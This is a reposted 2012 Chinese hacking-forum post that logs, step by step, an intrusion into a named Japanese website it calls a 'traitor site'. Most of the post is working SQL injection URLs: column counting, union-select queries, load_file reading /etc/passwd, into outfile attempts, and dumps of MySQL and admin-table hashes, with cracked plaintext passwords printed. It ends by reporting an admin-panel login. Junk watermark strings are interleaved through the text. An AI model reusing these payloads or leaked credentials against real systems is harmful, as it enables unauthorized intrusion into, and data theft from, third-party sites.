找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3416|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试

, T5 |- [3 I. ^; J/ D- `' B+ G- n( M3 Q" ~: O; \
0x01. 检测 www.zuaa.jp 收集数据
% C; Z" y  A6 O- T  q) E. S
/ d8 `! t+ Y' ?8 |5 S8 h8 q3 a; }+ J$ h9 g" {
whatweb6 D# w( n" ?  B+ J2 d) v: l

4 _; L% ~/ D/ ^2 M9 J9 z3 W* L5 n$ f8 ^3 E
利用NMAP扫描! d) c. Z: y1 x1 q1 e0 U

) w8 O! X- x) G, h中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持5 O: h: _- H7 d) \4 R$ x! S0 D
0x02.找注入点
! E% x  ^' v- d找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3901 Z  g) o8 h8 \) G/ ^' c
: _& f4 N, i, [0 J3 P

- g! G: W. F& o1 Y3 m8 v0x03.order by
* l- u& C: ?! W# v* \             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
( N1 r; r0 w) O9 O' r9 C2 P! v
/ y6 T4 s: x. i, H! d/ R4 Torder by 28报错,order by 27正常( N+ D$ d3 K4 Q6 [* E: A+ V5 s

8 C7 p& a, [( ]6 E3 h. l7 Y0x04.   union手动查询
8 _: w& M" z& w0 ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ i: D' J  C0 l  F3 R
添加到 27 时正常显示 ! \7 z& y8 t# B& F  p* L

' ]) g- Y+ M& B中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
3 B( W' E, _8 a! z5 u- E5 _" L- @9 O3 a( R* }
0x05. info:
' E) p! E& O6 I. e# v1 Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 7 ~2 I! w4 y3 f# f

; ^# @6 e3 u3 j4 Y8 n) s$ [( Ruser:            root@localhost+ ^8 B# V/ r) \. j* \2 p4 I
database:    openpne
* B1 s+ d& \5 N/ t. pversion:      4.1.224 z2 _1 U( _* ]
os:             portbld-freebsd5.4) z. X2 W+ r5 P, j4 J+ F
, C( e+ Y5 n; [
0x06. root用户1 m3 \  B( U! ^+ T' L
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
1 x  v2 s' k" u" F3 s- }' y4 I! `% {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, p( b5 R; N5 L1 }: d3 c7 s/ Y3 u8 ?" H. Y4 [8 m; v% S
通过工具转换& S9 C' v: \* P# O8 W
, g8 s# n- b  r$ v7 _( A% [6 J
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
) w' X# t+ d. T9 w
3 V8 b8 w# q# ?- `  K0x07. 利用 into outfile
" q6 [7 I, X, m3 C$ _3 i3 z- R全部都失败( }& s. f' e4 f( M! M9 N5 O
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
0 {' ?- o0 C2 [4 o. D3 `, O3 t7 W: S% o  ^: s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
2 [1 m  [7 t- B4 |9 O
. V/ x5 s5 ^) y6 r! _0 D页面显示“MDB2 Error:syntax error”
4 S9 O' S! F' U- B
! V4 v. X! K) i, T0 o0x08. 利用 mysql 4.1
6 q  Q& U/ M( F猜常规表名,字段未果 工具 sqlmap) L: {" q- r% Z+ W+ k+ `
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持( L( {3 R1 H8 D
. ]- l9 K" w8 V2 {8 c8 S6 k6 H4 `
- [% P6 }. K3 S1 X
2 I) w  x" ?; a9 o) Y0 d1 o* j9 N
0x09. 查找后台
; K, |1 `; R0 l/ h# F利用 现有的各种 后台工具尝试都不行* N' ~6 Y' U6 r2 X4 J

/ l5 s0 j% `8 Q0x10.  MySL外联方法
7 @5 p2 c# @& a; E8 x6 R) ?从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
# {( k! X! D  t) Q8 ?+ ?2 ]# f) T可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user9 G8 k0 P2 h. ~4 [& [/ k
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
. w1 j5 X- I" i5 i* d/ k
0 @' I- u- d) R" L* }' C这个可以在 www.cmd5.com 解密
$ g* [/ a5 ^+ c  {, _3 x) vroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
9 n/ V/ s1 u$ N- ochen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
7 J8 a  P- G; u6 [7 l! Jopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???3 p& y: Q; v, b8 p! k3 B$ s) q, }
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
4 f% c! V* C% E; K工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知+ \& `* ]4 P4 t

" I( u  `+ u' G% R* Q
- a( W% _5 ]1 X  u, ]( A/ I0x11. 网站突破& @% G4 e( S  v! K
发现网站的源程序 openpne, google 下载 openpne 源码
) ?" }. H6 z" J, F3 [  e+ _
- H" @6 I8 D. |$ [) |8 C' i  X& o
5 K( E$ R, w! D. [0 f0x12. 默认信息利用8 g. j3 Z& Y. t1 W4 f
http://sns.zuaa.jp/?m=admin&a=page_login: T8 k# ?) V, `$ ~
+ W9 F$ e0 }+ D! l, w: p+ M7 w+ f! @% {
表名 (c_admin_user) ,字段名(username,password)
) C+ e, V$ x1 C/ C, Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
: n( Z6 V# z, M7 }! G
" b3 |# ^5 M  o! x解密
) F6 q. u5 E- G6 Rzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
. `' X& T% p* n6 Z. H1 uzuaajp:c0923ec5857796a393da99905008c176,          zju1897
+ a! z8 H( _; l" A* A* f9 l
" R3 U4 Y( S/ t$ ~* j; [1 X中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: M6 o& |8 p; `* U2 y# l2 N4 K- r6 z: j
0x13. 登录后台7 e0 `7 q! J! o$ G5 M
3 g1 w! t8 P1 q* O) k
1 ^( r4 q% f% M% V2 m, L
5 W4 v; A" O( ?; G* y7 U
0x14. 小结+ R+ [7 A3 |+ O# q: I8 e' e
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
# W6 ?% |! W) h3 c0 y: E感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点1 ^' @( S/ e1 o
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain4 c& s6 D; ^  t% ?+ l
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" o! V- v! _1 ?) V2 v- }
6 }4 s! {8 e* k4 Q6 W* _最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!3 Y1 j" ~7 _4 \4 N$ n

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表